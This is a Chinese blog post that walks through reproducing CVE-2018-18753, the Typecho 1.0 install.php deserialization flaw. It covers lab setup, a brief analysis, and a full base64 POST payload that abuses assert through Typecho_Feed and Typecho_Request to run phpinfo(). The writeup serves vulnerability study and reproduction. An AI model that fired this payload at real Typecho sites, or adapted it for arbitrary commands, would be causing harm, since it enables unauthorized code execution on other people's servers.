Typecho CMS 反序列化漏洞(CVE-2018-18753)复现

最新推荐文章于 2024-04-24 14:57:51 发布
最新推荐文章于 2024-04-24 14:57:51 发布
阅读量507 收藏 4
点赞数 7
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80661529/article/details/136753311
版权

1.环境搭建

项目地址:Release Typecho 1.0(14.10.10) · typecho/typecho · GitHub

 安装:

创建数据库typecho

create database typecho;

再进入安装程序,输入数据库密码,设置登录密码即可

 直接使用即可

2.漏洞分析

install.php文件中,存在反序列化漏洞

typecho_Cookie的get函数从cookie或者post中获取参数

由上可知,要先存在finish参数,

 同时,必须有referer

3.漏洞复现

3.1以用户身份访问环境

3.2再访问install.php,传入get参数finish,并且post传参

payload:

Referer处,填写前一个网页的url即可

post:

__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUxMTc5NTIwMTtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

发包后即可,执行phpinfo();

格外推文:

https://www.cnblogs.com/seizer/p/17187936.html

https://www.cnblogs.com/wuhongbin/p/15526142.html

Yf3_te
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
普元EOS Platform eos.jmx 远程代码执行漏洞复现
0xSec
04-24 1454
普元EOS Platform 中间件 eos.jmx 接口存在反序列化漏洞,未经身份验证的攻击者可利用此漏洞执行任意代码,反弹shell或者写入后门文件,进一步可获取服务器权限。
反序列化漏洞分析与复现工作
kali_Ma的博客
01-08 2579
0x00 概述 GENESIS64软件的多个版本存在反序列化漏洞,影响多个组件,例如: 根据CVE漏洞相关描述,下载对应GENESIS软件版本搭建环境,进行漏洞分析与复现工作。 【一>所有资源获取<一】 1、200份很多已经买不到的绝版电子书 2、30G安全大厂内部的视频资料 3、100份src文档 4、常见安全面试题 5、ctf大赛经典题目解析 6、全套工具包 7、应急响应笔记 8、网络安全学习路线 0x01 服务分析 安装完成后对整个系统进行熟悉,发现Web程序接口使用Silverl
typecho主题-简洁大气cms模板 v1.0
10-24
typecho博客程序的一款粉红色简洁大气cms模板,首页采用3栏设计方式,根据栏目自定生成,适合做女性资讯类、文章资讯类等网站。
基于Typecho CMS框架开发大中型应用
weixin_33974433的博客
11-02 104
基于Typecho CMS框架开发大中型应用 大中型应用暂且定义为:大于等于3个数据表的应用!汗吧! Typecho原本是一款博客系统,其框架体系有别于市面上一般意义MVC框架,主体代码以自创的Widget为基类,整体非常简洁。 Typecho基本特性如下: 单一入口 除Db配置外,其他配置存于DB中 路由配置也存于DB中 自创Widget层,无传统Model层 自创Action层,类似传统的C...
typecho cms 利用工具
07-30
typecho cms漏洞利用工具可以直接getshell 功能强大使用方便
EOS 反序列化交易,获取交易ID
changliangwl的专栏
09-07 801
var crypto = require('crypto'); var { Serialize ,Api ,JsonRpc} = require('eosjs'); var fetch = require('node-fetch'); var { JsSignatureProvider } = require('eosjs/dist/eosjs-jssig'); var { TextEncoder, TextDecoder } = require('util'); var se...
反序列化漏洞漏洞复现
来日可期的博客
09-05 2410
反序列化漏洞是指应用程序在对已经序列化的数据进行反序列化时,由于缺少必要的验证或过滤,导致恶意数据被成功地反序列化为对象并被执行。攻击者可以构造恶意数据来利用这个漏洞,攻击方式通常是通过网络等传输渠道向目标应用程序发送序列化数据,使得应用程序在反序列化时执行了攻击者所构造的恶意代码,进而导致应用程序受到攻击。
typecho-1.1-15.5.12-beta.zip
03-17
本文将详细探讨“typecho-1.1-15.5.12-beta.zip”压缩包中的Typecho 1.1版本至15.5.12 Beta版本中存在的反序列化漏洞,以帮助读者理解这一安全隐患及其可能的影响,并提供防范措施。 Typecho是一款开源的轻量级博客...
typecho-plugin-Access:用于Typecho的访问日志插件
04-29
Typecho Access 插件提供简易的访客记录查看。获取访客信息,生成统计图表。功能简介/更新说明查看IP/UV/PVip归属地使用淘宝API管理员登录时不记录日志查看来源页和来源域名排名修复Referer记录错误的bug添加删除...
简数采集器Typecho免登录采集发布插件接口-免费
12-14
免费简单好用的简数采集器Typecho采集发布插件接口: 1. 支持将采集的数据发送到Typecho 1.1.0版本和Typecho 1.2.0版本; 2. Typecho采集发布插件接口有密码安全验证,使用安全可靠,还可以控制重复数据不发布; 3. ...
typecho-theme-material:Typecho的Material Design主题
05-12
当前测试均在 PHP 7.4/8.0 与 Typecho 1.1 正式版及开发版下完成,在可能的情况下请尽量接近此环境 Feature 特性 简洁高效的侧边栏 极其丰富的自定义设置 友好的多语言设定 中英文之间自动添加空格 后台更新检测 ...
typecho-plugin-BlockIP:Typecho IP黑名单插件
05-10
Typecho IP黑名单插件 禁止讨厌鬼访问网站,眼不见心不烦~ 一行一个,支持规则qwq 以下是例子qwq 不要留空行,不然所有ip段都会被屏蔽qwq 192.168.1.1 210.10.2.1-20 222.34.4.* 218.192.104.*
普元EOS Platform远程代码执行漏洞复现(XVE-2023-24691)
最新发布
0xSec
04-24 1393
普元EOS Platform 中间件 任意 .jmx或者.download 后缀的接口存在反序列化漏洞,未经身份验证的攻击者可利用此漏洞执行任意代码,反弹shell或者写入后门文件,进一步可获取服务器权限。
Typecho-CMS反序列化任意代码执行漏洞分析和复现
weixin_43058307的博客
08-10 596
Typecho-CMS反序列化 代码审计 漏洞的入口出现在install.php //判断是否已经安装 if (!isset($_GET['finish']) && file_exists(__TYPECHO_ROOT_DIR__ . '/config.inc.php') && empty($_SESSION['typecho'])) { exit; } // 挡掉可能的跨站请求 if (!empty($_GET) || !empty($_POST)) {
CVE-2018-18753 Typecho 漏洞复现分析
OceanSJ的博客
02-17 459
找到unserialize()函数;验证_typecho_config参数可控;追踪对象$db发现了Magic方法并跟踪至敏感函数call_user_func()
TypechoCMS通用发布插件-【免登录版本】
ccchen888的博客
08-22 724
TypechoCMS通用发布插件-【免登录版本】:它是一款可以模拟手动发布文章的插件,批量接收大量数据并发布,省时省力且免费!! 它需要和采集工具搭配使用的,采集器可以帮你获取需要的数据。市面上有很多采集器,你可以选择一款合适的即可,迅睿CMS免登陆发布插件基本都支持的。 推荐这几款采集器:火车采集器,简数采集器,八爪鱼采集器等...
typecho_1.0_14.10.10_unserialize
weixin_43886198的博客
12-21 760
typecho_1.0_14.10.10_unserialize 漏洞描述 typecho 是博客CMS,前台install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意PHP 代码。 漏洞危害等级 高危 影响版本 typecho1.0(14.10.10) 漏洞复现 基础环境 组件 版本 OS Win10 Webserver MAMP PRO _PHP5.6.37 typecho 1.0(14.10.10) 网站安装 需要进入数据库创建一个typ
TypechoCMS反序列化漏洞CVE-2018-18753
m0_57379855的博客
03-12 1341
TypechoCMS反序列化漏洞(CVE-2018-18753Typecho反序列化漏洞php-pocpython-poc Typecho反序列化漏洞 PHP版本:5.4.5nts(PHPStudy) 在数据库新建一个数据库typecho 只要传一个不存在的成员变量,就会触发_get()魔法函数 使用_get()调用applyFilter() call_user_func() 可以执行任意命令,包括写入文件 php-poc python-poc 重点函数 ...
序列化和反序列化的详解
大数据同盟会的博客
07-02 2363
序列化: 就是把内存中的对象,转换成字节序列(或其他数据传输协议)以便于存储(持久化)和网络传输; 反序列化: 就是将收到字节序列(或其他数据传输协议)或者是硬盘的持久化数据,转换成内存中的对象。 1、Java 序列化 是一个重量级序列化框架(Serializable),它会把这个对象的方方面面的信息都序列化出去,产生的二进制序列体积臃肿庞大,但是信息很全。 public class SerDeDemo { public static void main(String[] args) throws
docker-compose安装typecho
08-24
要在Docker中使用docker-compose安装Typecho,您可以按照以下步骤进行操作: 步骤1:创建一个新目录,并在其中创建一个名为`docker-compose.yml`的文件。 步骤2:在`docker-compose.yml`文件中添加以下内容: ```yaml version: '3' services: db: image: mysql:5.7 restart: always environment: MYSQL_ROOT_PASSWORD: your_mysql_root_password MYSQL_DATABASE: typecho MYSQL_USER: typecho MYSQL_PASSWORD: your_typecho_db_password typecho: image: typecho/typecho:latest restart: always ports: - 80:80 depends_on: - db environment: MYSQL_HOST: db MYSQL_PORT: 3306 MYSQL_DATABASE: typecho MYSQL_USER: typecho MYSQL_PASSWORD: your_typecho_db_password ``` 请确保将`your_mysql_root_password`和`your_typecho_db_password`替换为您自己的密码。 步骤3:保存文件并在命令行中导航到包含`docker-compose.yml`文件的目录。 步骤4:运行以下命令来启动Typecho容器: ```bash docker-compose up -d ``` 这将下载Typecho和MySQL的镜像,并在后台启动容器。 步骤5:等待一段时间,然后在浏览器中访问`http://localhost`即可开始Typecho的安装过程。 请注意,如果您希望通过其他端口访问Typecho,请修改`docker-compose.yml`文件中的端口映射。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值